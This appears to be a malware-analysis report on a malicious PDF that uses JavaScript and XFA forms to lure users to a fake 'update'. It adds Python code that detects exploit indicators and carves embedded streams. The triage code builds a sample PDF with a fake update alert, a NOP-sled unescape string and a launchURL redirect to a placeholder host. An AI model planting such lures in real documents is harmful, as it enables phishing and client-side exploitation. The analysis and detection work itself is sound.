Malicious PDF — malware analysis report

Static analysis result for SHA-256 09f0f49373ab8299…

Verdict: MALICIOUS
File type: PDF
Size: 775.5 KB
Created: 2008-02-15 14:41:46 +01:00
Authoring application: AcroForm (via Adobe LiveCycle Designer ES 8.1)
MD5: 76b502521b13d3df9e88e621099ad3fb
SHA-1: dec8ea6736f6444a8628f66dcd851150f734a11f
SHA-256: 09f0f49373ab82990095e321cc4037c44887f53295e93590e9bc0f8d008cc4d7
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Phishing: Spearphishing Attachment

The PDF contains XFA forms and embedded JavaScript, both of which have repeatedly been used to exploit vulnerabilities in Adobe Reader and Acrobat. The JavaScript displays an alert box telling the user that an update is required and then redirects to 'http://cgi.adobe.com/special/acrobat/update'. The alert is the social-engineering lure and the URL is the likely source of a secondary payload; despite the adobe.com hostname it should be handled as an indicator to check, not as a trusted resource. The ML classifier score and the ClamAV signature, together with the JavaScript/exploit-staging cluster scored below, support the malicious verdict. The three carved JavaScript streams (objects 1082 to 1084 in the artifact list) are the place to start a manual review.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9443

Heuristics (10)

  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • ClamAV: Pdf.Exploit.Agent-20192 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-20192
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Optional Content Group with action trigger low PDF_OPTIONAL_CONTENT
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Most entries below are raw strings pulled from XML namespace declarations, font name tables and DER-encoded X.509 certificate data rather than from document actions, so several carry a trailing ASN.1 byte (a '0' is the 0x30 SEQUENCE tag of the next element, '0D' and '01' are a tag plus length byte) or ran into the neighbouring string in the source; those have been split here. Only http://cgi.adobe.com/special/acrobat/update is reached from the JavaScript lure described above. The certificate CRL/OCSP/AIA locations (verisign.com, microsoft.com) indicate that a signed object is embedded in the sample and are not contact points for the malware.
    • http://www.monotype.com (immediately followed by the string "Monotype" in the source)
    • http://ocsp.verisign.com0
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/pdf/1.3/
    • http://ns.adobe.com/xfa/promoted-desc/
    • http://cgi.adobe.com/special/acrobat/update (JavaScript lure target)
    • http://ns.adobe.com/xdp/
    • http://www.xfa.org/schema/xci/1.0/
    • http://www.xfa.org/schema/xfa-template/2.4/
    • http://www.w3.org/1999/xhtml
    • http://www.xfa.org/schema/xfa-data/1.0/
    • http://www.xfa.org/schema/xfa-locale-set/2.1/
    • http://ns.adobe.com/xtd/
    • http://ns.adobe.com/xfdf/
    • http://www.xfa.org/schema/xfa-form/2.6/
    • http://www.monotype.com/html/mtname/ms_arial.html
    • http://www.monotype.com/html/mtname/ms_welcome.html
    • http://www.monotype.com/html/type/license.html
    • https://www.verisign.com/rpa
    • http://ocsp.verisign.com/ocsp/status0
    • https://www.verisign.com/rpa0
    • http://crl.microsoft.com/pki/crl/products/CodeSignPCA.crl0
    • http://www.microsoft.com/typography
    • http://crl.verisign.com/ThawteTimestampingCA.crl0
    • http://crl.verisign.com/tss-ca.crl0
    • https://www.verisign.com/rpa01
    • http://crl.verisign.com/pca3.crl0
    • http://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D
    • http://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0
    • http://www.adobe.com/type
    • http://www.adobe.com/type/legal.html
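The heuristic families above (JavaScript action, /JS stream, XFA, embedded file, OCG and /Btn co-occurring with an action trigger, the exploit-staging cluster, and URL extraction with a per-URL channel label) can be reproduced with a few regexes once compressed streams are inflated. The following is an added example written for this page, not the scanner's own code: the sample PDF, its object numbers, the lure text and the .invalid hostnames are constructed for illustration, and the rule names mirror the report's labels but the matching logic is an assumption about how such rules work.

```python
"""Static PDF triage for the heuristic families listed in the report.
Stdlib only. SAMPLE_PDF and everything in it is constructed here for
illustration; it is not the analysed file."""
import re
import zlib

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
ACTION_TRIGGER = re.compile(rb"/S\s*/(JavaScript|URI|Launch|SubmitForm)\b")
STAGING = re.compile(rb"\b(eval|unescape|fromCharCode)\s*\(")
URL_RE = re.compile(rb"https?://[\w.\-/%?=&#:+~]+")


def inflate_streams(pdf: bytes) -> bytes:
    """Replace every zlib-compressed stream body with its inflated content so
    that /JS text hidden behind /FlateDecode is visible to the regex rules.
    Bodies that do not inflate (plain text, or not zlib) are left untouched."""
    def _sub(m):
        try:
            return b"stream\n" + zlib.decompress(m.group(1)) + b"\nendstream"
        except zlib.error:
            return m.group(0)
    return STREAM_RE.sub(_sub, pdf)


def extract_urls(text: bytes) -> list:
    """Return (url, channel) pairs: 'uri-action' when the URL is the target of
    a /URI action, 'stream' when it sits inside an (inflated) stream body such
    as JavaScript or XFA XML, otherwise 'body'."""
    spans = [m.span(1) for m in STREAM_RE.finditer(text)]
    out = []
    for m in URL_RE.finditer(text):
        s = m.start()
        if re.search(rb"/URI\s*\($", text[max(0, s - 16):s]):
            channel = "uri-action"
        elif any(a <= s < b for a, b in spans):
            channel = "stream"
        else:
            channel = "body"
        out.append((m.group(0).decode("latin-1"), channel))
    return out


def triage(pdf: bytes) -> dict:
    """Run the rules and return (rule, severity) findings plus extracted URLs.
    Generic JS/XFA/embedded-file presence is 'low'; JS combined with staging
    indicators (eval/unescape/fromCharCode or an XFA <script>) is 'critical'."""
    text = inflate_streams(pdf)
    findings = []
    js_action = re.search(rb"/S\s*/JavaScript\b", text) is not None
    js_stream = re.search(rb"/JS\b", text) is not None
    xfa = re.search(rb"/XFA\b", text) is not None
    trigger = ACTION_TRIGGER.search(text) is not None
    if js_action:
        findings.append(("PDF_JAVASCRIPT", "low"))
    if js_stream:
        findings.append(("PDF_JS", "low"))
    if re.search(rb"/EmbeddedFile\b", text):
        findings.append(("PDF_EMBEDDED", "low"))
    if xfa:
        findings.append(("PDF_XFA", "low"))
    if trigger and re.search(rb"/OCProperties\b", text):
        findings.append(("PDF_OPTIONAL_CONTENT", "low"))
    if trigger and re.search(rb"/FT\s*/Btn\b", text):
        findings.append(("PDF_ACROFORM_BUTTON", "low"))
    xfa_script = re.search(rb"<script\b", text) is not None  # XFA script element
    if (js_action or js_stream) and (STAGING.search(text) or xfa_script):
        findings.append(("PDF_JS_EXPLOIT_CLUSTER", "critical"))
    return {"findings": findings, "urls": extract_urls(text)}


# Constructed sample: OpenAction JavaScript behind FlateDecode, an XFA
# reference, a hidden OCG, a /Btn "Download" field with a URI action and an
# embedded file. Hostnames use the reserved .invalid TLD.
JS_LURE = (b"var u='http://cgi.example.invalid/update';"
           b"app.alert('Please install the update');"
           b"var sc=unescape('%u9090%u9090');app.launchURL(u,true);")
_js_def = zlib.compress(JS_LURE)
SAMPLE_PDF = (
    b"%PDF-1.6\n"
    b"1 0 obj << /Type /Catalog /OpenAction 5 0 R"
    b" /AcroForm << /XFA 7 0 R /Fields [6 0 R] >>"
    b" /OCProperties << /OCGs [8 0 R] >> >> endobj\n"
    b"5 0 obj << /S /JavaScript /JS 9 0 R >> endobj\n"
    b"6 0 obj << /FT /Btn /T (Download) /A << /S /URI /URI (http://lure.example.invalid/get) >> >> endobj\n"
    b"7 0 obj << /Length 56 >> stream\n"
    b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"></xdp:xdp>\nendstream endobj\n'
    b"8 0 obj << /Type /OCG /Name (hidden) >> endobj\n"
    b"9 0 obj << /Filter /FlateDecode /Length " + str(len(_js_def)).encode()
    + b" >> stream\n" + _js_def + b"\nendstream endobj\n"
    b"10 0 obj << /Type /Filespec /F (payload.bin) /EF << /F 11 0 R >> >> endobj\n"
    b"11 0 obj << /Type /EmbeddedFile /Length 4 >> stream\nMZ\x90\x00\nendstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    result = triage(SAMPLE_PDF)
    for rule, severity in result["findings"]:
        print(f"{severity:8s} {rule}")
    for url, channel in result["urls"]:
        print(f"URL [{channel}] {url}")
```

The inflation step is what matters in practice: the lure JavaScript in the sample never appears in cleartext on disk, so a grep for `unescape` over the raw file finds nothing, while the rules fire once the stream is inflated. Benign form JavaScript (a field calculation with no staging calls) still produces only the two low-severity findings, which is the behaviour the report's rule text describes.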

Extracted artifacts (16)

Files carved from inside the sample during analysis.

Each entry lists the carved filename, its kind, the source location inside the sample, the size and the SHA-256 of the carved bytes.

embedded_file_obj0304.bin
  Kind: pdf-embedded-file   Source: PDF EmbeddedFile object 304 at offset 0xA9789   Size: 86 bytes
  SHA-256: f7ee3ef2f8f35d669a6c2b8b0b0ee89655bbc3d04b107a8d22531830f6fc28a1
embedded_file_obj0305.bin
  Kind: pdf-embedded-file   Source: PDF EmbeddedFile object 305 at offset 0xA983E   Size: 2013 bytes
  SHA-256: 539bb0dc3d533dea4997a7dc59e3c33ef624313c40e1dd953ba223d43bd3562a
embedded_file_obj0306.bin
  Kind: pdf-embedded-file   Source: PDF EmbeddedFile object 306 at offset 0xA9BBD   Size: 1025950 bytes
  SHA-256: c06222e209ce01b6bdc8cda23741aa5a2f6200cfb72e25ffc808d3b0c2a12942
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 2 long base64-like blobs)
embedded_file_obj0307.bin
  Kind: pdf-embedded-file   Source: PDF EmbeddedFile object 307 at offset 0xB804F   Size: 2415 bytes
  SHA-256: bac3e4de866ac1448036bb843b9b97f7525c1e48b40f0b6335cf6bfcf93c9858
embedded_file_obj0308.bin
  Kind: pdf-embedded-file   Source: PDF EmbeddedFile object 308 at offset 0xB8341   Size: 2014 bytes
  SHA-256: 454f05c5039ecbbf413e4412383dddc6944e0fb13ce7ce7fcb1515aef1d91819
embedded_file_obj0309.bin
  Kind: pdf-embedded-file   Source: PDF EmbeddedFile object 309 at offset 0xB852F   Size: 200 bytes
  SHA-256: 500856001a9edb17a299f41c8b34871c12c85d56ec8eff03ef181fca24bb96b5
embedded_file_obj0310.bin
  Kind: pdf-embedded-file   Source: PDF EmbeddedFile object 310 at offset 0xB8625   Size: 1218 bytes
  SHA-256: 56c83cc92abed3c964a609ef5c89c2f134f7a3d73de93e6af31d215141ad9110
embedded_file_obj0311.bin
  Kind: pdf-embedded-file   Source: PDF EmbeddedFile object 311 at offset 0xB8882   Size: 80 bytes
  SHA-256: 2ebdd7efeaa1190ff6bad8cbd649b313e3969564018f204e7385b97c2fab1e19
embedded_file_obj0312.bin
  Kind: pdf-embedded-file   Source: PDF EmbeddedFile object 312 at offset 0xB892D   Size: 63 bytes
  SHA-256: ad801486e3cb7389075fad83415aa12a315eba18ebcc5a81167104cfcb6fd70b
javascript_obj1082_000.js
  Kind: pdf-javascript-stream   Source: PDF /JS object 1082 at offset 0x1810   Size: 1532 bytes
  SHA-256: f574e4d51594d1a8fd22e125b109b827c437aa898edc78babb62dbb93f8744f8
javascript_obj1083_001.js
  Kind: pdf-javascript-stream   Source: PDF /JS object 1083 at offset 0x19FD   Size: 870 bytes
  SHA-256: 4a1aca004cf20431c9a66dce85404a6411a54d881a6c257882260ffc972a13eb
javascript_obj1084_002.js
  Kind: pdf-javascript-stream   Source: PDF /JS object 1084 at offset 0x1B59   Size: 3792 bytes
  SHA-256: 42532e6508d5c2db0ab8c8dfcd630c448464119f6e0ad9b9d96e038b45e726fc
stream_053_off0000b8f0.bin
  Kind: decompressed-pdf-stream   Source: PDF FlateDecoded stream at offset 0xB8F0   Size: 78969 bytes
  SHA-256: d471946590249e9daf7aa91da1ce61ccfee32eef6886a8aa6e15902698f3d6c9
stream_136_off00032685.bin
  Kind: decompressed-pdf-stream   Source: PDF FlateDecoded stream at offset 0x32685   Size: 352198 bytes
  SHA-256: 1e8564d3d89047875dccaa98279599de9d7ddf77240906041f1156ba8edf3315
stream_139_off00074d2c.bin
  Kind: decompressed-pdf-stream   Source: PDF FlateDecoded stream at offset 0x74D2C   Size: 367087 bytes
  SHA-256: b8e2518b116c26bab0e9f8c1672daf405dedad561157502b657e9005be2029aa
font_01_sfnt_off00065197.bin
  Kind: pdf-font-stream   Source: PDF embedded font (sfnt) at offset 0x65197   Size: 94875 bytes
  SHA-256: 058d11642e857508126df5662db2c7af4bdc1892e73eea6fc33f2605a1fc3c20
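The artifact list above is the output of a carver: walk every "N G obj", read its dictionary, slice the stream body, inflate it when it is FlateDecode, then record object number, offset, size and SHA-256, plus a check for long base64-like runs of the kind flagged on object 306. The following is an added example written for this page, not the analysis pipeline's own carver; the sample PDF is constructed, the reported offset is that of the object header (the page does not say which offset its "at offset" column uses), and the base64 threshold is an assumption.

```python
"""Carve EmbeddedFile objects and FlateDecode streams from a PDF and report
them the way the artifact list does. Stdlib only. SAMPLE_PDF is constructed
here for illustration; it is not the analysed file."""
import hashlib
import re
import zlib

OBJ_HDR = re.compile(rb"(\d+)\s+(\d+)\s+obj\b")
STREAM_KW = re.compile(rb"\s*stream\r?\n")
DIRECT_LENGTH = re.compile(rb"/Length\s+(\d+)(?!\s+\d+\s+R)")  # not 'N G R'
B64_BLOB = re.compile(rb"[A-Za-z0-9+/]{80,}={0,2}")  # threshold is an assumption


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def read_dict(buf: bytes, pos: int):
    """Return (dict_bytes, end) for the '<< ... >>' at pos, honouring nested
    dictionaries such as /Params << /Size 120 >> inside an EmbeddedFile."""
    depth, i = 0, pos
    while i < len(buf):
        if buf.startswith(b"<<", i):
            depth += 1
            i += 2
        elif buf.startswith(b">>", i):
            depth -= 1
            i += 2
            if depth == 0:
                return buf[pos:i], i
        else:
            i += 1
    raise ValueError("unterminated dictionary at offset %d" % pos)


def stream_body(buf: bytes, dict_end: int, d: bytes):
    """Slice the raw stream body after a dictionary, or None if the object
    has no stream. A direct /Length is trusted only if it lands on
    'endstream'; otherwise the keyword is searched for, so a deliberately
    wrong or indirect /Length does not hide the data from the carver."""
    m = STREAM_KW.match(buf, dict_end)
    if not m:
        return None
    start = m.end()
    ln = DIRECT_LENGTH.search(d)
    if ln:
        end = start + int(ln.group(1))
        if buf[end:end + 12].lstrip(b"\r\n").startswith(b"endstream"):
            return buf[start:end]
    end = buf.find(b"endstream", start)
    if end < 0:
        return None
    body = buf[start:end]
    # drop the single EOL that precedes 'endstream'; it is not stream data
    if body.endswith(b"\r\n"):
        return body[:-2]
    return body[:-1] if body.endswith((b"\n", b"\r")) else body


def carve(pdf: bytes) -> list:
    """Return one record per stream object, in file order."""
    artifacts = []
    for m in OBJ_HDR.finditer(pdf):
        i = re.compile(rb"\s*").match(pdf, m.end()).end()
        if not pdf.startswith(b"<<", i):
            continue  # bare object such as an indirect /Length value
        d, dict_end = read_dict(pdf, i)
        body = stream_body(pdf, dict_end, d)
        if body is None:
            continue
        data, kind = body, "raw-pdf-stream"
        if b"/FlateDecode" in d:
            try:
                data, kind = zlib.decompress(body), "decompressed-pdf-stream"
            except zlib.error:
                kind = "undecodable-flate-stream"  # keep raw bytes, flag it
        if re.search(rb"/Type\s*/EmbeddedFile\b", d):
            kind = "pdf-embedded-file"
        artifacts.append({
            "object": int(m.group(1)),
            "offset": m.start(),  # offset of the 'N G obj' header
            "kind": kind,
            "size": len(data),
            "sha256": sha256_hex(data),
            "b64_blobs": len(B64_BLOB.findall(data)),
        })
    return artifacts


# Constructed sample: an EmbeddedFile whose body is a 120-character run of
# base64 alphabet, a bare object holding an indirect /Length, and a
# Flate-compressed content stream that references that indirect /Length.
PAYLOAD = b"QUJD" * 30
CONTENT = zlib.compress(b"BT /F1 12 Tf (hello) Tj ET")
SAMPLE_PDF = (
    b"%PDF-1.5\n"
    b"1 0 obj << /Type /Catalog /Names << /EmbeddedFiles << /Names [(p.bin) 2 0 R] >> >> >> endobj\n"
    b"2 0 obj << /Type /Filespec /F (p.bin) /EF << /F 3 0 R >> >> endobj\n"
    b"3 0 obj << /Type /EmbeddedFile /Params << /Size 120 >> /Length 120 >> stream\n"
    + PAYLOAD + b"\nendstream endobj\n"
    b"4 0 obj " + str(len(CONTENT)).encode() + b" endobj\n"
    b"5 0 obj << /Filter /FlateDecode /Length 4 0 R >> stream\n"
    + CONTENT + b"\nendstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for a in carve(SAMPLE_PDF):
        print("object %(object)d at offset 0x%(offset)X  %(kind)s  %(size)d bytes  "
              "sha256=%(sha256)s  base64-like blobs=%(b64_blobs)d" % a)
```

Hashing the inflated bytes rather than the on-disk stream is what makes the SHA-256 values in the list comparable across samples: the same payload recompressed by a different PDF writer gets a different raw stream but the same carved hash.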